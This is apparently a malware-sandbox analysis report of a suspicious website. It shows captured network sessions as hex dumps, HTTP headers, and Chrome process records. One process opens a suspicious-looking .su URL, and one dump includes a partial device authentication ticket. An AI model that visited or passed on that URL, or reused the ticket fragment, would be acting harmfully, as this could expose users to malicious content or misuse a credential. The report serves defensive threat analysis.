                                                          2024-01-24 14:34:32 UTC1369INData Raw: b2 8f f0 ad 7f 1f 76 74 e9 cb 90 f9 fa f0 64 3c 49 e1 f4 85 08 01 0b d4 9f 5c ca 9d 24 49 92 24 49 92 24 c9 39 38 2a 60 11 a2 fc 14 0e b3 a4 21 62 d9 83 2d 1f ae be 42 cc ef bf 02 c2 15 77 b5 78 0d 10 36 2e 6e 8a 02 2e e0 7f 08 9e 56 d8 0a 17 3e e1 81 9b b7 62 48 f6 30 d9 b7 7f d9 8c ec f7 64 f9 89 9f 62 98 7c 76 28 12 66 c6 6d 06 bd 6c 49 92 24 49 92 24 49 92 24 6f e5 e2 ff f9 37 b7 8f 1f ef ee 9b bf fd e8 c2 74 3a 9b 98 80 fd cb df cc 9b eb a9 2f 01 06 5b ea cb 2c ea 0e 41 eb 33 af 97 97 a3 bd 63 df b3 8c f8 c2 be 0e 75 8a 6e 71 01 8a 80 f5 f3 53 c0 df 43 f6 53 30 7d 79 ea 77 60 b3 3c 92 24 49 92 24 49 92 24 39 17 17 ff e9 bf fe f8 f8 71 d9 34 cc c2 de 6d 1e 9b 1b 89 cf 3f 7c 3f 6f 7e f7 61 6c 02 56 ff 5b 36 bc 6c 2a f8 7d d7 21 2e cb 2c 69 7f e6 35 f9
                                                          Data Ascii: vtd<I\$I$I$98*`!b-Bwx6.n.V>bH0db|v(fmlI$I$I$o7t:/[,A3cunqSCS0}yw`<$I$I$9q4m?|?o~alV[6l*}!.,i5
                                                          2024-01-24 14:34:32 UTC986INData Raw: 49 92 24 c9 39 39 49 c0 22 52 f9 12 2c 33 61 eb 32 b8 5f db 80 5f 62 c0 de 03 94 00 d8 76 62 f6 90 6e b1 25 a1 83 1b ee 7c d6 4e ff 0f c2 75 c2 b0 9f 2f 29 ef 1f 76 61 9e 57 2c 25 6f c7 67 5e df 28 e2 f8 92 12 82 58 e2 75 36 f2 f7 58 99 e9 64 d6 13 11 fb dd 77 1f 6c 0b 86 44 ed d0 d2 62 a3 37 33 1a b3 b5 50 cf dc c6 86 30 ad b7 30 07 66 75 89 63 3d db 7a a1 3a 9d 24 49 92 24 49 92 24 c9 f9 78 76 09 31 c2 d0 66 a7 b4 d9 4c 95 c4 2a f0 b3 21 97 bc 53 38 f6 41 fb e5 e5 a8 b9 90 d8 e0 d8 bf bc fa 74 e9 28 62 93 ad 8f 7d dd d5 74 8a ff 76 e6 31 b7 36 13 1c 9f 85 15 cc c8 29 60 77 5b 9c 0c b9 4f 3e 1f fe 20 c2 cb e8 ad cb 67 29 6f 1e 9e 2c 17 8b e6 d3 dd 5d 73 7f fb c9 7e 46 e7 fe fe 61 6f f6 14 62 46 34 66 4f 6b 11 1a b3 a2 f6 1e 2b 75 94 ba 3b ba b4 87 20 7b
                                                          Data Ascii: I$99I"R,3a2__bvbn%|Nu/)vaW,%og^(Xu6XdwlDb73P00fuc=z:$I$I$xv1fL*!S8At(b}tv16)`w[O> g)o,]s~FaobF4fOk+u; {


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          48192.168.2.64977852.159.126.152443
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:51 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 79 46 38 38 2f 43 76 63 4d 45 57 52 4f 59 38 54 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 66 64 38 30 64 66 64 61 33 38 66 39 33 62 32 0d 0a 0d 0a
                                                          Data Ascii: CNT 1 CON 305MS-CV: yF88/CvcMEWROY8T.1Context: 9fd80dfda38f93b2
                                                          2024-01-24 14:34:51 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                          2024-01-24 14:34:51 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 79 46 38 38 2f 43 76 63 4d 45 57 52 4f 59 38 54 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 66 64 38 30 64 66 64 61 33 38 66 39 33 62 32 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 77 2b 31 66 33 69 61 34 31 7a 5a 2b 77 76 46 41 79 4c 6a 79 4a 4f 35 78 62 41 42 68 6e 53 35 76 63 2f 63 50 34 66 65 41 6f 6c 56 30 51 4e 33 4a 6d 36 57 4e 72 67 4f 55 68 2f 76 6b 32 6c 34 42 67 2b 31 68 66 65 76 67 39 4b 67 31 59 53 55 5a 62 30 41 48 4c 79 53 39 58 33 6e 71 77 37 45 55 67 38 4e 78 67 62 61 6f 56 6a 6d 77
                                                          Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: yF88/CvcMEWROY8T.2Context: 9fd80dfda38f93b2<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARw+1f3ia41zZ+wvFAyLjyJO5xbABhnS5vc/cP4feAolV0QN3Jm6WNrgOUh/vk2l4Bg+1hfevg9Kg1YSUZb0AHLyS9X3nqw7EUg8NxgbaoVjmw
                                                          2024-01-24 14:34:51 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 79 46 38 38 2f 43 76 63 4d 45 57 52 4f 59 38 54 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 66 64 38 30 64 66 64 61 33 38 66 39 33 62 32 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                          Data Ascii: BND 3 CON\WNS 0 197MS-CV: yF88/CvcMEWROY8T.3Context: 9fd80dfda38f93b2<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                          2024-01-24 14:34:51 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                          Data Ascii: 202 1 CON 58
                                                          2024-01-24 14:34:51 UTC58INData Raw: 4d 53 2d 43 56 3a 20 55 4c 2f 48 46 75 2f 48 35 30 36 50 45 58 63 46 48 34 37 31 31 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                          Data Ascii: MS-CV: UL/HFu/H506PEXcFH4711w.0Payload parsing failed.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          49192.168.2.64978152.159.126.152443
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:35:14 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 53 75 4c 59 63 6b 37 57 51 6b 79 61 33 2b 42 56 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 62 36 31 35 61 35 30 33 38 65 39 31 64 37 31 0d 0a 0d 0a
                                                          Data Ascii: CNT 1 CON 305MS-CV: SuLYck7WQkya3+BV.1Context: db615a5038e91d71
                                                          2024-01-24 14:35:14 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                          2024-01-24 14:35:14 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 53 75 4c 59 63 6b 37 57 51 6b 79 61 33 2b 42 56 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 62 36 31 35 61 35 30 33 38 65 39 31 64 37 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 77 2b 31 66 33 69 61 34 31 7a 5a 2b 77 76 46 41 79 4c 6a 79 4a 4f 35 78 62 41 42 68 6e 53 35 76 63 2f 63 50 34 66 65 41 6f 6c 56 30 51 4e 33 4a 6d 36 57 4e 72 67 4f 55 68 2f 76 6b 32 6c 34 42 67 2b 31 68 66 65 76 67 39 4b 67 31 59 53 55 5a 62 30 41 48 4c 79 53 39 58 33 6e 71 77 37 45 55 67 38 4e 78 67 62 61 6f 56 6a 6d 77
                                                          Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: SuLYck7WQkya3+BV.2Context: db615a5038e91d71<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARw+1f3ia41zZ+wvFAyLjyJO5xbABhnS5vc/cP4feAolV0QN3Jm6WNrgOUh/vk2l4Bg+1hfevg9Kg1YSUZb0AHLyS9X3nqw7EUg8NxgbaoVjmw
                                                          2024-01-24 14:35:14 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 53 75 4c 59 63 6b 37 57 51 6b 79 61 33 2b 42 56 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 62 36 31 35 61 35 30 33 38 65 39 31 64 37 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                          Data Ascii: BND 3 CON\WNS 0 197MS-CV: SuLYck7WQkya3+BV.3Context: db615a5038e91d71<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                          2024-01-24 14:35:14 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                          Data Ascii: 202 1 CON 58
                                                          2024-01-24 14:35:14 UTC58INData Raw: 4d 53 2d 43 56 3a 20 51 53 78 58 69 31 46 4a 5a 45 53 33 66 4c 6f 55 55 42 2b 6a 6a 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                          Data Ascii: MS-CV: QSxXi1FJZES3fLoUUB+jjA.0Payload parsing failed.


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          50192.168.2.649782172.253.124.101443
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:35:20 UTC449OUTGET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=0000000000000000000000000000000000000000825E607DC1 HTTP/1.1
                                                          Host: clients1.google.com
                                                          Connection: keep-alive
                                                          Sec-Fetch-Site: none
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: empty
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept-Encoding: gzip, deflate, br
                                                          2024-01-24 14:35:20 UTC817INHTTP/1.1 200 OK
                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-7_iln_pajwb70gfDr_H3-g' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/download-dt/1
                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-Cn_EMNzTnyGy_zfe-mNxHQ' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/download-dt/1
                                                          Content-Type: text/plain; charset=utf-8
                                                          Content-Length: 220
                                                          Date: Wed, 24 Jan 2024 14:35:20 GMT
                                                          Expires: Wed, 24 Jan 2024 14:35:20 GMT
                                                          Cache-Control: private, max-age=0
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-XSS-Protection: 1; mode=block
                                                          Server: GSE
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close
                                                          2024-01-24 14:35:20 UTC220INData Raw: 72 6c 7a 43 31 3a 20 31 43 31 4f 4e 47 52 5f 65 6e 55 53 31 30 39 34 0a 72 6c 7a 43 32 3a 20 31 43 32 4f 4e 47 52 5f 65 6e 55 53 31 30 39 34 0a 72 6c 7a 43 37 3a 20 31 43 37 4f 4e 47 52 5f 65 6e 55 53 31 30 39 34 0a 64 63 63 3a 20 0a 73 65 74 5f 64 63 63 3a 20 43 31 3a 31 43 31 4f 4e 47 52 5f 65 6e 55 53 31 30 39 34 2c 43 32 3a 31 43 32 4f 4e 47 52 5f 65 6e 55 53 31 30 39 34 2c 43 37 3a 31 43 37 4f 4e 47 52 5f 65 6e 55 53 31 30 39 34 0a 65 76 65 6e 74 73 3a 20 43 31 49 2c 43 32 49 2c 43 37 49 2c 43 31 53 2c 43 37 53 0a 73 74 61 74 65 66 75 6c 2d 65 76 65 6e 74 73 3a 20 43 31 49 2c 43 32 49 2c 43 37 49 0a 63 72 63 33 32 3a 20 64 36 39 64 62 32 35 38 0a
                                                          Data Ascii: rlzC1: 1C1ONGR_enUS1094rlzC2: 1C2ONGR_enUS1094rlzC7: 1C7ONGR_enUS1094dcc: set_dcc: C1:1C1ONGR_enUS1094,C2:1C2ONGR_enUS1094,C7:1C7ONGR_enUS1094events: C1I,C2I,C7I,C1S,C7Sstateful-events: C1I,C2I,C7Icrc32: d69db258


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:15:33:47
                                                          Start date:24/01/2024
                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                                                          Imagebase:0x7ff684c40000
                                                          File size:3'242'272 bytes
                                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:2
                                                          Start time:15:33:50
                                                          Start date:24/01/2024
                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2588 --field-trial-handle=2272,i,569364735770316750,3485990403573813858,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                          Imagebase:0x7ff684c40000
                                                          File size:3'242'272 bytes
                                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:3
                                                          Start time:15:33:53
                                                          Start date:24/01/2024
                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" "https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/Ad89NLTS/
                                                          Imagebase:0x7ff684c40000
                                                          File size:3'242'272 bytes
                                                          MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          No disassembly